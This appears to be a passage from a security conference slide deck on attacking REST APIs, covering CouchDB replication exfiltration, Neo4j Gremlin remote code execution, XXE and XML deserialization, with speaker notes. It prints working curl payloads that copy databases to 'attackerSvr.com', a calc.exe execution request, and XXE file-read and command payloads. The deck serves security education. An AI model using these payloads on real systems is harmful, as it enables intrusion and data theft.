  • 20. Mongo DB REST API • Find all databases in the Mongo DB: – http://host:27080/ – http://host:27080/api/1/databases • Find all the collections under a named database ({db_name}) in the Mongo DB: – http://host:27080/api/1/database/{db_name}/collect ions
  • 21. Cassandra.io REST API • Find all keyspaces in the Cassandra.io DB: – http://host:port/1/keyspaces • Find all the column families in the Cassandra.io DB: – http://host:port/1/columnfamily/{keyspace_name }
  • 22. Internal REST API • Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs. • Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs. Pub REST API Inbred Architecture Internal DB
  • 23. Extensions in REST frameworks that enhance development of REST functionality at the expense of security • Turns remote code execution and data exfiltration from a security vulnerability into a feature. – In some cases it is subtle: • Passing in partial script blocks used in evaluating the processing of nodes. • Passing in JavaScript functions which are used in map-reduce processes. – In others it is more obvious: • Passing in a complete Groovy script which is executed as a part of the request on the server. Gremlin Plug-in for Neo4j. • Passing in the source and target URLs for data replication
  • 24. Rest Extensions Remote Code Execution(Demo) • curl -X POST http://localhost:7474/db/data/ext/GremlinPlugi n/graphdb/execute_script -d '{"script":"import java.lang.Runtime;rt = Runtime.getRuntime().exec("c:/Windows/System3 2/calc.exe")", "params": {} }' -H "Content-Type: application/json"
  • 25. Rest Extensions Data Exfiltration Example (Couch DB) • curl –X POST http://internalSrv.com:5984/_replicate –d ‘{“source”:”db_name”, “target”:”http://attackerSvr.com:5984/corpData” }’ –H “Content-Type: application/json” • curl –X POST http://srv.com:5984/_replicate –d ‘{“source”:”http://anotherInternalSvr.com:5984/ db”, “target”:”http://attackerSvr.com:5984/corpData” }’ –H “Content-Type: application/json”
  • 26. Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL urlPost = new URL(“http://svr.com:5984/customers/” + id); String name = request.getParameter(“name”); String json = “{”fullName”:”” + name + “”}”; How can you exfiltrate the data given the above?
  • 27. Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL url = new URL(“http://svr.com:5984/customers/../_replicate”); String name = request.getParameter(“name”); String json = “{”fullName”:”X”, ”source”:”customers”, ”target”:”http://attackerSvr.com:5984/corpData”}”; Attacker provides: id = “../_replicate” name = ‘X”, “source”:”customers”, “target”:”http://attackerSvr.com:5984/corpData’
  • 28. Reliance on incorrectly implemented protocols (SAML, XML Signature, XML Encryption, etc.) • SAML, XML Signature, XML Encryption can be subverted using wrapping based attacks.* See: How to Break XML Encryption by Tibor Jager and Juraj Somorovsky, On Breaking SAML: Be Whoever You Want to Be by Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen, and How To Break XML Signature and XML Encryption by Juraj Somorovsky (OWASP Presentation)
  • 29. Incorrect assumptions of REST application behavior • REST provides for dynamic URLs and dynamic resource allocation
  • 30. REST provides for dynamic URLs and dynamic resource allocation Example Case Study • You have an Mongo DB REST API which exposes two databases which can only be accessed at /realtime/* and /predictive/* • There are two static ACLs which protect all access to each of these databases <web-resource-name>Realtime User</web-resource-name> <urlpattern>/realtime/*</url-pattern> <web-resource-name>Predictive Analysis User</web-resource-name> <url-pattern>/predicitive/*</url-pattern> Can anyone see the problem? You should be able to own the server with as little disruption to the existing databases.
  • 31. Example Case Study Exploit • The problem is not in the two databases. The problem is that you are working with a REST API and resources are dynamic. • So POST to the following url to create a new database called test which is accessible at “/test”: POST http://svr.com:27080/test • Then POST the following: POST http://svr.com:27080/test/_cmd – With the following body: cmd={…, “$reduce”:”function (obj, prev) { malicious_code() }” …
  • 32. REST Input Types and Interfaces • Does anyone know what the main input types are to REST interfaces?
  • 33. REST Input Types and Interfaces • Does anyone know what the main input types are to REST interfaces? – XML and JSON
  • 34. XML Related Vulnerabilities • When you think of XML--what vulnerabilities come to mind?
  • 35. XML Related Vulnerabilities • When you think of XML--what vulnerabilities come to mind? – XXE (eXternal XML Entity Injection) / SSRF (Server Side Request Forgery) – XSLT Injection – XDOS – XML Injection – XML Serialization
  • 36. XXE (File Disclosure and Port Scanning) • Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes. • XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘../WEB-INF/web.xml’> ]> <Customer> <name>&y;</name> </Customer> *See Attacking <?xml?> processing by Nicolas Gregoire (Agarri) and XML Out-of-Band Data Retrieval by Timur Yunusov and Alexey Osipov
  • 37. XXE (Remote Code Execution) • Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes. • XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘expect://ls’> ]> <Customer> <name>&y;</name> </Customer> *See XXE: advanced exploitation, d0znpp, ONSEC *expect protocol requires pexpect module to be loaded in PHP *joernchen has another example at https://gist.github.com/joernchen/3623896
  • 38. XXE Today • At one time most REST frameworks were vulnerable to XXE • But newer versions have patched this vulnerability. • For more information Timothy Morgan is giving a talk at AppSec USA titled, “What You Didn’t Know About XML External Entities Attacks”.
  • 39. XML Serialization Vulns • Every REST API allows the raw input of XML to be converted to native objects. This deserialization process can be used to execute arbitrary code on the REST server.
  • 40. Understanding XML Serialization • Mainly Three Mechanisms Used by Server Logic – Server looks where to go before going • Create an object based on the target type defined in the application then assign values from the xml to that instance – Server asks user where to go • Create and object based on a user specified type in the provided XML then assign values (to public or private fields) from the xml to that instance, finally cast the created object to the target type defined in the application – Server asks user where to go and what to do • Create and object based on a user specified type in the provided XML then assign values from the xml to that instance, allow object assignments and invoke arbitrary methods on the newly created instance, finally cast the created object to the target type defined in the application
  • 41. Vulnerable XML Serialization APIs • In our research we found one API that “asks the user where to go”: – XStream • More limited • Cannot invoke methods • Relies on existing APIs to trigger the code execution • And another that “asks the user where to go and what to do”: – XMLDecoder • Unrestricted • execute arbitrary methods on newly created objects which are defined in the input • Near Turning complete
  • 42. XML Serialization Remote Code Execution – XStream (Demo) • new XStreamRepresentation(…) • <bean id="xstreamMarshaller“ class="org.springframework.oxm.xstream.XStreamM arshaller"> • Alvaro Munoz figured this out
  • 43. XML Serialization Remote Code Execution – XMLDecoder(Demo) • new ObjectRepresentation • Direct Usage of XMLDecoder* XMLDecoder dec = new XMLDecoder( new ByteArrayInputStream(bad_bytes)); values = (List<YourObject>) dec.readObject(); • If you notice that XMLDecoder file is processed by backend systems then you have a serious compromise by anyone who maliciously controls the XML – Look for the following in your XML <java class="java.beans.XMLDecoder"> <object class="Customer" id="Customer0"> *Modified Version of code from the chapter “A RESTful version of the Team Services” of “Java Web Services: Up and Running” by Martin Kalin
  • 44. XML Serialization Remote Shell (Demo)
  • 45. Conclusion • By now you should agree that publically exposed or internal REST APIs probably have remote code execution or data exfiltration issues.

Notes de l'éditeur

  1. Find an HTTP proxy in the publically exposed Application/REST API or get access to curl on a compromised system in the internal networkFigure out which systems are running on the internal network and target a data rich server. (Port Scanning and Fingerprinting is easier because the REST protocol is self describing)Exfiltrate data from the REST interface of the backend system and pass the correct parameters by sniffing the network, reusing credentials, using default userids and passwords, bypassing authentication, reading server logs to find apiKeys, etc.
  2. Many REST API frameworks provide extensions that allow clients to pass arbitrary code to server to be executed as a part of the request.
  3. Many REST API frameworks provide extensions that allow clients to pass arbitrary code to server to be executed as a part of the request.